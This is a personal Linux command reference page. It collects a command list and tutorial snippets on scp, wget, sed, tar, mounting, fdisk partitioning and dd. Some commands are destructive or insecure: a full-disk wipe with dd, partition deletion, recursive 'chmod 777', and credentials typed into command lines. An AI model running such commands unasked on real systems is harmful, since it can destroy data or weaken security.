hash Remember the full pathname of a name argument
head Output the first part of file(s)
history Command History
hostname Print or set system name


id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
import Capture an X server screen and save the image to file
install Copy files and set attributes


join Join lines on a common field


kill Stop a process from running


less Display output one screen at a time
let Perform arithmetic on shell variables
ln Make links between files
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files


make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mv Move or rename files or directories


netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
nslookup Query Internet name servers interactively


passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory


quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
 
ram ram disk device
rcp Copy files between two machines.
read read a line from standard input
readonly Mark variables/functions as readonly
remsync Synchronize remote files via email
return Exit a shell function
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
 
screen Terminal window manager
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sum Print a checksum for a file
symlink Make a new name for a file
sync Synchronize data on disk with memory
 
tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command
 
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
 
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor


watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Report all known instances of a command
which Locate a program file in the user's path.
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP


xargs Execute utility, passing constructed argument list(s)
yes Print a string until interrupted
. Run a command script in the current shell
# Comment / Remark
</pre>
== Copy Files Using SCP ==
<pre>
copy from a remote machine to my machine (run this from the local machine's terminal):
scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt
copy from my machine to a remote machine:
scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt
copy all file*.txt from a remote machine to my machine (file01.txt, file02.txt, etc.; note the quotation marks):
scp "user@192.168.1.100:/home/remote_user/Desktop/file*.txt" /home/me/Desktop/
copy a directory from a remote machine to my machine:
scp -r user@192.168.1.100:/home/remote_user/Desktop/files /home/me/Desktop/
local to remote:
scp -r directory root@domain.com:/var/www/
copy the files and directories of the directory you are currently cd'd into:
scp -r * root@domain.com:/var/www/
scp with a key:
scp -i ~/.ssh/id_rsa FILENAME USER@SERVER:/home/USER/FILENAME
see 'man scp' or 'man sftp' for more ..
</pre>
== My Frequently used Linux Commands ==
<pre>
<h4>Command to show all users:</h4>
cat /etc/passwd
lastlog

<h4>List all installed Apache Modules</h4>
apache2ctl -M

<h4>Update server</h4>
sudo apt-get update
sudo apt-get dist-upgrade

<h4>Move files and folders</h4>
mv *.*  - will move all files and not folders
mv *    - will move all files and folders

<h4>Updating Ubuntu</h4>
sudo aptitude update
sudo aptitude safe-upgrade

<h4>ssh using a different port</h4>
ssh -p 113 root@whatever.com

<h4>Change Permissions</h4>
chmod 777 -R folder
use 755

Read More ... Setting File and Directory Permissions

<h4>Restart network in Fedora</h4>
/etc/init.d/network restart

<h4>Change the owner and group</h4>
chown bacchas2:psacln -R folder

<h4>Create New Directories</h4>
$ mkdir /tmp/new          Create "new" directory in /tmp
$ mkdir -p /tmp/a/b/c/new Create parent directories as needed for "new"
$ mkdir -m 700 /tmp/new2  Create new2 with drwx------ permissions

'''The first mkdir command simply adds the new directory to the existing /tmp directory. The second example creates directories as needed (subdirectories a, b, and c) to create the resulting new directory. The last command adds the -m option to set directory permissions as well.'''

<h4>Removing files and directories</h4>
rm [-f] [-i] [-R] [-r] [filenames | directory]
* -f    Remove all files (whether write-protected or not) in a directory without prompting the user. In a write-protected directory, however, files are never removed (whatever their permissions are), but no messages are displayed. If the removal of a write-protected directory is attempted, this option will not suppress an error message.
* -i    Interactive. With this option, rm prompts for confirmation before removing any files. It overrides the -f option and remains in effect even if the standard input is not a terminal.
* -R    Same as the -r option.
* -r    Recursively remove directories and subdirectories in the argument list. The directory will be emptied of files and removed. The user is normally prompted for removal of any write-protected files which the directory contains. The write-protected files are removed without prompting, however, if the -f option is used, or if the standard input is not a terminal and the -i option is not used. Symbolic links that are encountered with this option will not be traversed. If the removal of a non-empty, write-protected directory is attempted, the utility will always fail (even if the -f option is used), resulting in an error message.
* filenames    A path of a filename to be removed.

<h4>Examples</h4>
rm myfile.txt
'''Remove the file myfile.txt without prompting the user.'''

rm -r directory
'''Remove a directory, even if files exist in that directory.'''

<h3>Listing Files</h3>
'''Although you are probably quite familiar with the ls command, you may not be familiar with many of the useful options for ls that can help you find out a lot about the files on your system. Here are some examples of using ls to display long lists (-l) of files and directories:'''

* $ ls -l      Files and directories in current directory
* $ ls -la    Includes files/directories beginning with dot (.)
* $ ls -lt    Orders files by time recently changed
* $ ls -lu    Orders files by time recently accessed
* $ ls -lS    Orders files by size
* $ ls -li    Lists the inode associated with each file
* $ ls -ln    List numeric user/group IDs, instead of names
* $ ls -lh    List file sizes in human-readable form (K, M, etc.)
* $ ls -lR    List files recursively, from current directory and subdirectories

<h4>When you list files, there are also ways to have different types of files appear differently in the listing:</h4>
$ ls -F                Add a character to indicate file type
'''myfile-symlink@    config/  memo.txt  pipefile|  script.sh* xpid.socket='''
$ ls --color=always    Show file types as different colors
$ ls -C                Show files listing in columns

'''In the -F example, the output shows several different file types. The myfile-symlink@ indicates a symbolic link to a directory, config/ is a regular directory, memo.txt is a regular file (no extra characters), pipefile| is a named pipe (created with mkfifo), script.sh* is an executable file, and xpid.socket= is a socket. The next two examples display different file types in different colors and list output in columns, respectively.'''
</pre>
----
==[[#Xargs|Back To Top]]-[[Main_Page| Home]] - [[Ubuntu_Tips|Category]]==


Diff Command

diff -y originalfile.txt revisedfile.txt

Cut Command: can extract contiguous text from a file, e.g. characters 2-10 of every line

cut -c 2-10 textfile.txt
Will extract characters 2 through 10 on each line
cut -c 2-10,30-35 filename.txt
Will extract characters 2-10 and 30-35
cut -f 2,6 -d "," filename.csv
-f along with the -d option will let you pick fields and specify the delimiter
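
For example, a quick sketch of the field/delimiter form on a made-up CSV line (the file name and contents are just illustrations):

echo "john,smith,42,ny,usa,accounting" > filename.csv
cut -f 2,6 -d "," filename.csv
# prints: smith,accounting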

TR (translate function)

Replace the , in a text file with a ; and write the result to a new file (don't redirect the output back onto the same file you are reading; the shell truncates it before tr can read it)
tr ',' ';' < somefile.csv > newfile.csv
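
If you really do want the result back in the original file, a simple sketch is to write to a temporary file and then move it over the original:

tr ',' ';' < somefile.csv > somefile.tmp && mv somefile.tmp somefile.csv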

Standard Input and Standard Output

Send sorted output to a new file
sort somefile.txt > newfilename.txt
To append, use >> instead of >
Suppressing output
ls -la > /dev/null

How To Change Multiple File Extensions From The Terminal

1. Open a new terminal and create the following directory on your desktop.

cd  /home/oltjano/Desktop

mkdir unixmen_tutorial

2.  cd to unixmen_tutorial and create the following files.

a.txt   b.txt  c.txt

3. Run the following piece of code in the terminal and see what happens.

for i in *.txt; do echo $i; done

4. You should see each .txt filename (a.txt, b.txt, c.txt) printed on its own line in your terminal.

What we are doing here is running a for loop and printing every filename ending in .txt in the current directory. Now run the following commands; they are used to strip the extension from a file.

a=a.txt

echo ${a/.txt}

5. This should print the variable's value with the .txt extension stripped (in this case just "a").

6. Now run the following piece of code in your terminal and check whether the file extensions have changed.

for i in *.txt;  do mv "$i" "${i/.txt}".jpg; done
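
The same idea works for any pair of extensions; here is a small sketch with the old and new extensions in variables (the names are illustrative), using suffix removal instead of substitution:

old=txt; new=jpg
for i in *."$old"; do mv "$i" "${i%.$old}.$new"; done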

Wget Command

Download a single file

$ wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz

Download and store it with a different name.

$ wget -O taglist.zip http://www.vim.org/scripts/download_script.php?src_id=7701

Download in the Background Using wget -b

For a huge download, put the download in background using wget option -b as shown below.

$ wget -b http://www.openss7.org/repos/tarballs/strx25-0.9.2.1.tar.bz2

Mask User Agent and Make wget Look Like a Browser Using wget --user-agent

Some websites disallow downloads when they detect that the user agent is not a browser. You can mask the user agent with the --user-agent option to make wget look like a browser, as shown below.

wget --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" URL-TO-DOWNLOAD

Download Multiple Files / URLs Using Wget -i

First, store all the download files or URLs in a text file as:

$ cat > download-file-list.txt

URL1

URL2

URL3

URL4

Next, give the download-file-list.txt as argument to wget using -i option as shown below.

$ wget -i download-file-list.txt

Download a Full Website Using wget --mirror

The following is the command line to execute when you want to download a full website and make it available for local viewing.

$ wget --mirror -p --convert-links -P ./LOCAL-DIR WEBSITE-URL

--mirror : turn on options suitable for mirroring.

-p : download all files that are necessary to properly display a given HTML page.

--convert-links : after the download, convert the links in the documents for local viewing.

-P ./LOCAL-DIR : save all the files and directories to the specified directory.

Reject Certain File Types while Downloading Using wget --reject

If you have found a useful website but don't want to download its images, you can specify the following.

$ wget --reject=gif WEBSITE-TO-BE-DOWNLOADED
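
As a sketch, the rejection list can be combined with the mirroring options shown above (the extension list is just an example):

$ wget --mirror -p --convert-links --reject=gif,jpg,png -P ./LOCAL-DIR WEBSITE-URL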

Download Only Certain File Types Using wget -r -A

You can use this in the following situations:

Download all images from a website

Download all videos from a website

Download all PDF files from a website

$ wget -r -A.pdf http://url-to-webpage-with-pdfs/

FTP Download With wget

You can use wget to perform FTP download as shown below.

Anonymous FTP download using Wget

$ wget ftp-url

FTP download using wget with username and password authentication.

$ wget --ftp-user=USERNAME --ftp-password=PASSWORD DOWNLOAD-URL

Move Multiple folders to another directory

mv -v /home/user1/Desktop/folder1/* /var/tmp/

This will move the contents of folder1 to the /var/tmp folder

Using Grep and find to search through eml files

Using Grep and Find to search through .eml files for a specific phrase

go to the dir in question

find . -exec grep -ils 'text to find' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

above will find the files and copy them to specified folder

find . -exec grep -ils 'text to find\|more text to find\|even more text' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

Above will find multiple search strings

find . -type f -name ".DS_Store" -exec rm -f {} \;

Above will find .DS_Store files in the current dir and subdirs and delete them

find . -exec grep -ls 'text to find' /dev/null {} \;
find . -exec grep -H 'text to look for' {} \;
find . -exec grep -n 'text to look for' /dev/null {} \;
find . -exec grep -n 'yuly' /dev/null {} \; -print >> /Volumes/RAIDset1/1share/text.txt

List files whose name contains "out"

ls -la | grep out

Find files in a dir whose names contain a string; -i makes it case insensitive, -w matches the exact word

find dirname | grep -i  string
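
For example, the same search done case-insensitively and matching the whole word only:

find dirname | grep -iw string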

SED find and replace

sed -i (in place) s (substitute) /find/replace/ g (global). You can replace the / with any other delimiter, e.g. | or :. For example, if you want to find the text "/mac" you would use : as the delimiter: sed -i 's:/mac:mac:g'
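
For example, a complete command using : as the delimiter on a hypothetical file:

sed -i 's:/mac:mac:g' somefile.txt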

Find and Replace Multiple (add the -e switch)

sed -e 's/find/replace/g' -e 's/find/replace/g'

Let us start off simple: Imagine you have a large file ( txt, php, html, anything ) and you want to replace all the words "ugly" with "beautiful"

This is the command:

sed -i 's/ugly/beautiful/g' /home/bruno/old-friends/sue.txt

"sed" edits "-i" in place (on the spot) and replaces the word "ugly" with "beautiful" in the file /home/bruno/old-friends/sue.txt

Imagine you have a whole lot of files in a directory and you want the same command to process all those files in one go. Remember the find command? We will combine the two:

$ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g' {} \;

Sure, in combination with the find command you can do all kinds of nice tricks, even if you don't remember where the files are located!

Additionally, here is a little script found on the net for when you often have to find and replace in multiple files at once:

#!/bin/bash
     # quote "$fl" so filenames with spaces survive
     for fl in *.php; do
     mv "$fl" "$fl.old"
     sed 's/FINDSTRING/REPLACESTRING/g' "$fl.old" > "$fl"
     rm -f "$fl.old"
     done

Just replace "*.php", "FINDSTRING" and "REPLACESTRING", make it executable, and you are set.

I changed a www address in 183 .html files in one go with this little script . . . but note that you have to use "escape-signs" ( \ ) if there are slashes in the text you want to replace, so as an example: 's/www.search.yahoo.com\/images/www.google.com\/linux/g' to change www.search.yahoo.com/images to www.google.com/linux
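
The same replacement can be written without any escaping by picking a different delimiter for the s command, e.g. (the file name is just an illustration):

sed 's|www.search.yahoo.com/images|www.google.com/linux|g' file.html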


For the lovers of perl I also found this one:

# perl -e "s/old_string/new_string/g;" -pi.save $(find DirectoryName -type f)

Creating ISO File from a folder

If you want to make an iso file from a directory containing other files and sub-directories via the terminal, you can use the following command:

mkisofs -o image.iso -R /path/to/folder/

If you wish to backup the home folder, use this command:

mkisofs -o image.iso -R $HOME

Mount Windows SMB share on linux

  • apt install cifs-utils
  • mkdir /mnt/share
  • mount.cifs "//192.168.1.1/windows share" /mnt/share -o user=bob
    • use the quotes when there are spaces in the share name
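
A minimal sketch of mounting the same share at boot via /etc/fstab, assuming a credentials file at /root/.smbcredentials (a hypothetical path containing username= and password= lines):

//192.168.1.1/share  /mnt/share  cifs  credentials=/root/.smbcredentials,uid=1000,gid=1000  0  0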

Mount ftp server as local drive

1. Installation

First install curlftpfs package. On Debian or Ubuntu it would simple as:

apt-get install curlftpfs

2. Mount ftp directory What needs to be done next is to create a mount point:

# mkdir /mnt/my_ftp

next use curlftpfs to mount your remote ftp site. Suppose my access credentials are as follows:

username: ftp-user
password: ftp-pass
host/IP: my-ftp-location.local
the actual curlftpfs mount command would be:
# curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

Caution:

ftp uses unencrypted passwords, so anyone can intercept your password without much effort. Therefore use curlftpfs in combination with SSL certificates if you are not mounting some local LAN ftp server.

On Debian you can mount ftp using curlftpfs as root, and this allows only the root user to access the ftp mount. No other users are allowed, since by default only the user that mounts has access to the mount directory. When mounting ftp as a non-root user you may get the following error message:

fuse: failed to open /dev/fuse: Permission denied

Rather than changing the permissions of /dev/fuse, you can allow other users to access the ftp mount directory with curlftpfs's allow_other option. The command will look similar to the one below:

# curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

3. Mount ftp with curlftpfs using /etc/fstab

Since we do not want to put any passwords into the /etc/fstab file, we will first create a /root/.netrc file with the ftp username and password using this format:

machine my-ftp-location.local

login ftp-user password ftp-pass

Now change permissions of this file to 600:

# chmod 600 /root/.netrc

Check the uid and gid of your non-root user. This user will have access to the ftp mount directory:

$ id

In the next step add the following line to your /etc/fstab file (change the credentials for your ftp user):

curlftpfs#my-ftp-location.local /mnt/my_ftp fuse allow_other,uid=1000,gid=1000,umask=0022 0 0

Now mount ftp with:

mount -a

Creating Aliases

2. You can add more than one command on a line in the terminal if you separate them with a ; (semicolon), e.g. cd etc; ls; cd /

This will change to the etc dir, ls the dir, and then cd to root.

 

3. Create a temporary alias for your commands: alias foo='cd /etc; ls; cd /'

This will create an alias with the name foo. You can then execute foo, which will run the commands.

- to remove the alias: unalias foo

- display the commands in an alias: type foo

After the shell is closed the alias is gone.

 

4. Permanent alias: edit the .bashrc file -

nano .bashrc

add your alias to this file, e.g. alias foo='echo hello world'

save and close the file, then issue the command source .bashrc  # this reloads the changes in the .bashrc file

On a Mac the equivalent of .bashrc is in the home dir ~ and is called .bash_profile
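
For example, a couple of practical permanent aliases in ~/.bashrc might look like this (the names are just illustrations):

alias ll='ls -la'
alias update='sudo apt-get update && sudo apt-get dist-upgrade'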

Format a drive in bash

Linux refers to hard drives as either "hdx" or "sdx," where x is a letter, starting with a, which represents the order in which the drive was added to or detected by the computer. The "hd" prefix is used for IDE and PATA (formerly just ATA), and the "sd" prefix is used for SCSI, SATA and USB drives. Usually, a number is also put at the end of "hdx" or "sdx" to denote different partitions on the same physical drive, but for the purpose of formatting, you only need to know which letter the drive you want to format is.

4
The examples given in this how-to are for a computer with two IDE hard drives attached as a master and slave. In this, the drives are "hda" and "hdb." You will need to determine the letter of the drive you want to format for your own setup. We will be formatting the drive hdb. For all examples, replace "hdb" with whatever your drive designation is.

5
You can see all the drives attached to your system by typing the command "ls /dev/hd*" or "ls /dev/sd*", depending on which type (IDE, SATA and so forth) the drives are. On the example system, the result of this command looks like "/dev/hda /dev/hda1 /dev/hda2 /dev/hdb /dev/hdb1". The operating system is installed on hda, which has two partitions (hda1 and hda2), and there is one partition (hdb1) on hdb.

Using fdisk
6
First, you will use the fdisk command to erase any old partitions on the drive and create a new one. Any changes you make using fdisk are only made permanent if you then issue the "w" command before quitting, so feel free to play around a little if you like. If at any time you find yourself stuck, you can quit the program without saving changes by holding the "Ctrl" key and pressing "c."

7
At the command prompt, type "fdisk /dev/hdb", replacing the "hdb" with the letters for your drive. Upon opening, fdisk may give you a couple of warnings, all of which can be ignored. It then gives you a prompt that looks like this: Command (m for help):

8
Enter "p" to see the partition table of the drive. The first line of output from the "p" command will also tell you the size of the drive. This is a good way to double-check that you are working with the correct drive.

9
If there are any partitions already on the drive, they will be listed as the last lines of the "p" command. On our example, this looks like "/dev/hdb1", followed by some information about the partition's size and filesystem.

10
To delete any existing partitions, press "d" and then "Enter." It will ask you which partition number you wish to delete. The number of the partition is the number that follows hdb, so on our example system, we enter 1. If there are multiple partitions, repeat the "d" command for each one. You can always view the partition table again with the "p" command.

11
Once you have deleted all existing partitions on the drive, you are ready to make a new one. Type "n" and hit "Enter." Then press "p" to create a primary partition. It asks you for a partition number; enter "1." Now you are asked which cylinder the partition should start at. The beginning of the drive is the default, so just hit "Enter." Then, you are asked for the last cylinder. The end of the drive is the default, so you can just press "Enter" again.

12
Now you are back at fdisk's command prompt. Use the "p" command to check the partition table. You should now see your new partition at the bottom of the output. In the example, it lists as "/dev/hdb1."

13
You now need to set the filesystem type for your new partition with the "t" command. You are asked for the Hex code of the filesystem you wish to use. We will use the standard Linux ext2 filesystem, which is "83." If you are doing something special and know of a particular filesystem that you need to use, you can press "L" to see all the codes, which are one or two characters made up of the numbers 0 to 9 and the letters a to f.

14
Now just issue the "w" command to write your new partition table and exit fdisk.



Read more: How to Format a Hard Drive in Linux | eHow.com http://www.ehow.com/how_1000631_hard-drive-linux.html#ixzz1teq8yBrz
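
A minimal sketch of the remaining steps, assuming the example partition /dev/hdb1 and the ext filesystem type chosen above (adjust the device name for your own setup):

# create the filesystem on the new partition (mkfs.ext3 /dev/xxx also appears earlier on this page)
mkfs.ext3 /dev/hdb1
# create a mount point and mount it
mkdir /mnt/newdrive
mount /dev/hdb1 /mnt/newdrive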

Wput - uploading file from terminal

wput x ftp://username:password@domain.com/

x could be a directory or filename

example

wput filename.zip ftp://username:password@domain.com/Desktop/filename.zip

List and Mount a Drive

Using mount. Get the information: sometimes devices don't automount, in which case you should try to mount them manually. First, you must know what device you are dealing with and what filesystem it is formatted with. Most flash drives are FAT16 or FAT32 and most external hard disks are NTFS.

sudo fdisk -l

Find your device in the list; it is probably something like /dev/sdb1. For more information about filesystems, see LinuxFilesystemsExplained.

Create the Mount Point. Now we need to create a mount point for the device; let's say we want to call it "external". You can call it whatever you want, just don't use spaces in the name or it gets a little more complicated - use an underscore to separate words (like "my_external"). Create the mount point:

sudo mkdir /media/external

Mount the Drive. We can now mount the drive. Let's say the device is /dev/sdb1, the filesystem is FAT16 or FAT32 (like it is for most USB flash drives), and we want to mount it at /media/external (having already created the mount point):

sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000,gid=100,utf8,dmask=027,fmask=137

The options following the "-o" allow your user to have ownership of the drive, and the masks allow for extra security for file system permissions. If you don't use those extra options you may not be able to read and write the drive with your regular username.

Otherwise if the device is formatted with NTFS, run:

sudo mount -t ntfs-3g /dev/sdb1 /media/external

Unmounting the Drive. When you are finished with the device, don't forget to unmount the drive before disconnecting it. Assuming /dev/sdb1 is mounted at /media/external, you can unmount using either the device or the mount point:

sudo umount /dev/sdb1

or:

sudo umount /media/external

7 Useful Linux Networking Commands

ifconfig for basic interface and IP configuration


The ifconfig tool (derived from interface configurator) provides a few very basic, but important, functions. It lets you turn network adapters on and off and assign IP address and netmask details. Here are some of the common commands:

View current configuration of network interfaces, including the interface names:

ifconfig

Turn an adapter on (up) or off (down):

ifconfig <network name> <up|down>

Assign an IP address to an adapter:

ifconfig <network name> <ip address>

Assign a second IP address to an adapter:

ifconfig <network name:instance number> <ip address>

Example: ifconfig eth0:0 192.168.1.101

ethtool manages ethernet card settings

Ethtool lets you view and change many different settings for ethernet adapters (which does not include Wi-Fi cards). You can manage many different advanced settings, including tx/rx, checksumming, and wake-on-LAN settings. However, here are more basic commands you might be interested in:

Display the driver information for a specific network adapter, great when checking for software compatibility:

ethtool -i <interface name>

Initiate an adapter-specific action, usually blinking the LED lights on the adapter, to help you identify between multiple adapters or interface names:

ethtool -p <interface name>

Display network statistics:

ethtool -S <interface name>

Set the connection speed of the adapter in Mbps:

ethtool -s <interface name> speed <10|100|1000>

iwconfig for wireless configuration

The iwconfig tool is like ifconfig and ethtool for wireless cards. You can view and set the basic Wi-Fi network details, such as the SSID, channel, and encryption. There's also many advanced settings you can view and change, including receive sensitivity, RTS/CTS, fragmentation, and retries. Here are some commands you may want to try:

Display the wireless settings of your interfaces, including the interface names you'll need for other commands:

iwconfig

Set the ESSID (Extended Service Set Identifier) or network name:

iwconfig <interface name> essid <network name>

Example: iwconfig <interface name> essid "my network"

Example: iwconfig <interface name> essid any

Set the wireless channel of the radio (1-11):

iwconfig <interface name> channel <channel>

Input a WEP encryption key (WPA/WPA2 isn't supported yet; for this you need wpa_supplicant):

iwconfig eth0 key <key in HEX format>

Only allow the adapter to connect to an AP with the MAC address you specify:

iwconfig <interface name> ap <mac address>

Example: iwconfig eth0 ap 00:60:1D:01:23:45

Set the transmit power of the radio, if supported by the wireless card, in dBm format by default or mW when specified:

iwconfig <interface name> txpower <power level>

Example: iwconfig eth0 txpower 15

Example: iwconfig eth0 txpower 30mW

Accessing a Directory With a Space in The Filename

E.g. the directory name is "Dir 001"

To cd into that dir you would escape the space with a "\":

cd Dir\ 001

Manually Mount A Device in Ubuntu

To manually mount a media device in the virtual directory, you'll need to be logged in as the root user. The basic command for manually mounting a media device is:

mount -t type device directory

The type parameter defines the filesystem type the disk was formatted under. There are lots and lots of different filesystem types that Linux recognizes. If you share removable media devices with your Windows PCs, the types you're most likely to run into are:

  • vfat: Windows long filesystem.
  • ntfs: Windows advanced filesystem used in Windows NT, XP, and Vista.
  • iso9660: The standard CD-ROM filesystem.

Most USB memory sticks and floppies are formatted using the vfat filesystem. If you need to mount a data CD, you'll have to use the iso9660 filesystem type. The next two parameters define the location of the device file for the media device and the location in the virtual directory for the mount point. For example, to manually mount the USB memory stick at device /dev/sdb1 at location /media/disk, you'd use the command:

mount -t vfat /dev/sdb1 /media/disk

Once a media device is mounted in the virtual directory, the root user will have full access to the device, but access by other users will be restricted. You can control who has access to the device using directory permissions.

-a Mount all filesystems specified in the /etc/fstab file.

-f Causes the mount command to simulate mounting a device, but not actually mount it.

-F When used with the -a parameter, mounts all filesystems at the same time.

-v Verbose mode, explains all the steps required to mount the device.

-i Don't use any filesystem helper files under /sbin/mount.filesystem.

-l Add the filesystem labels automatically for ext2, ext3, or XFS filesystems.

-n Mount the device without registering it in the /etc/mtab mounted-device file.

-p num For encrypted mounting, read the passphrase from the file descriptor num.

-s Ignore mount options not supported by the filesystem.

-r Mount the device as read-only.

-w Mount the device as read-write (the default).

-L label Mount the device with the specified label.

-U uuid Mount the device with the specified uuid.

-O When used with the -a parameter, limits the set of filesystems applied.

-o Add specific options to the filesystem. The -o option allows you to mount the filesystem with a comma-separated list of additional options. The popular options to use are:

ro: Mount as read-only.

rw: Mount as read-write.

user: Allow an ordinary user to mount the filesystem.

check=none: Mount the filesystem without performing an integrity check.

loop: Mount a file.

A popular thing in Linux these days is to distribute a CD as a .iso file. The .iso file is a complete image of the CD in a single file. Most CD-burning software packages can create a new CD based on the .iso file. A feature of the mount command is that you can mount a .iso file directly to your Linux virtual directory without having to burn it onto a CD. This is accomplished using the -o parameter with the loop option:

$ mkdir mnt
$ su
Password:
# mount -t iso9660 -o loop MEPIS-KDE4-LIVE-DVD_32.iso mnt

Linux Directory Structure

/ The root of the virtual directory. Normally, no files are placed here.
/bin The binary directory, where many GNU user-level utilities are stored.
/boot The boot directory, where boot files are stored.
/dev The device directory, where Linux creates device nodes.
/etc The system configuration files directory.
/home The home directory, where Linux creates user directories.
/lib The library directory, where system and application library files are stored.
/media The media directory, a common place for mount points used for removable media.
/mnt The mount directory, another common place for mount points used for removable media.
/opt The optional directory, often used to store optional software packages.
/root The root home directory.
/sbin The system binary directory, where many GNU admin-level utilities are stored.
/tmp The temporary directory, where temporary work files can be created and destroyed.
/usr The user-installed software directory.
/var The variable directory, for files that change frequently, such as log files

TAR Files

To unzip .bz2 files use:

tar -jxvf filename.tar.bz2

to unzip gz files use:

tar -zxvf filename.tar.gz

Zip Files

zip and unzip

To create a zip file containing dir1, dir2, ... :

zip -r <filename>.zip dir1 dir2 ...

To extract <filename>.zip:

unzip <filename>.zip

In Unix, the name of the tar command is short for tape archiving, the storing of entire file systems onto magnetic tape, which is one use for the command. However, a more common use for tar is to simply combine a few files into a single file, for easy storage and distribution.

To combine multiple files and/or directories into a single file, use the following command:

tar -cvf file.tar inputfile1 inputfile2

Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the f option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The v option tells tar to be verbose, which reports all files as they are added.

To separate an archive created by tar into separate files, at the shell prompt, enter:

tar -xvf file.tar

Compressing and uncompressing tar files

Many modern Unix systems, such as Linux, use GNU tar, a version of tar produced by the Free Software Foundation. If your system uses GNU tar, you can easily use gzip (the GNU file compression program) in conjunction with tar to create compressed archives. To do this, enter:

tar -cvzf file.tar.gz inputfile1 inputfile2

Here, the z option tells tar to zip the archive as it is created. To unzip such a zipped tar file, enter:

tar -xvzf file.tar.gz

Alternatively, if your system does not use GNU tar, but nonetheless does have gzip, you can still create a compressed tar file, via the following command:

tar -cvf - inputfile1 inputfile2 | gzip > file.tar.gz

Note: If gzip isn't available on your system, use the Unix compress command instead. In the example above, replace gzip with compress and change the .gz extension to .Z (the compress command specifically looks for an uppercase Z). You can use other compression programs in this way as well. Just be sure to use the appropriate extension for the compressed file, so you can identify which program to use to decompress the file later.

If you are not using GNU tar, to separate a tar archive that was compressed by gzip, enter:

gunzip -c file.tar.gz | tar -xvf -

Similarly, to separate a tar archive compressed with the Unix compress command, replace gunzip with uncompress .

Lastly, the extensions .tgz and .tar.gz are equivalent; they both signify a tar file zipped with gzip.

Additional information

Keep the following in mind when using the tar command:

The order of the options sometimes matters. Some versions of tar require that the f option be immediately followed by a space and the name of the tar file being created or extracted.

Some versions require a single dash before the option string (e.g., -cvf ). GNU tar does not have either of these limitations.

The tar command has many additional command options available. For more information, consult the manual page. At the shell prompt, enter:

man tar

GNU tar comes with additional documentation, including a tutorial, accessible through the GNU Info interface. You can access this documentation by entering:

info tar Within the Info interface, press  ? (the question mark) for a list of commands

DD Unix Command

dd is a common Unix program whose primary purpose is the low-level copying and conversion of raw data

dd's input is specified using the "if" (input file) option, while most programs simply take the name by itself.

Example use of dd command to create an ISO disk image from a CD-ROM:

dd if=/dev/cdrom of=/home/sam/myCD.iso bs=2048 conv=sync,notrunc

Note that an attempt to copy the entire disk image using cp may omit the final block if it is an unexpected length; dd will always complete the copy if possible.

Using dd to wipe an entire disk with random data:

dd if=/dev/urandom of=/dev/hda

Using dd to duplicate one hard disk partition to another hard disk:

dd if=/dev/sda2 of=/dev/sdb2 bs=4096 conv=notrunc,noerror

Note that notrunc means do not truncate the output file. Noerror means to keep going if there is an error (though a better tool for this would be ddrescue).

To duplicate a disk partition as a disk image file on a different partition

dd if=/dev/sdb2 of=/home/sam/partition.image bs=4096 conv=notrunc,noerror

To duplicate a disk partition as a disk image file on a remote machine over a secure ssh connection:

dd if=/dev/sdb2 | ssh user@host "dd of=/home/user/partition.image"

To duplicate master boot record only

dd if=/dev/sda of=/home/sam/MBR.image bs=446 count=1

To make drive benchmark test and analyze read and write performance

dd if=/dev/zero bs=1024 count=1000000 of=/home/sam/1Gb.file
dd if=/home/sam/1Gb.file bs=64k | dd of=/dev/null

To make a file of 100 random bytes:

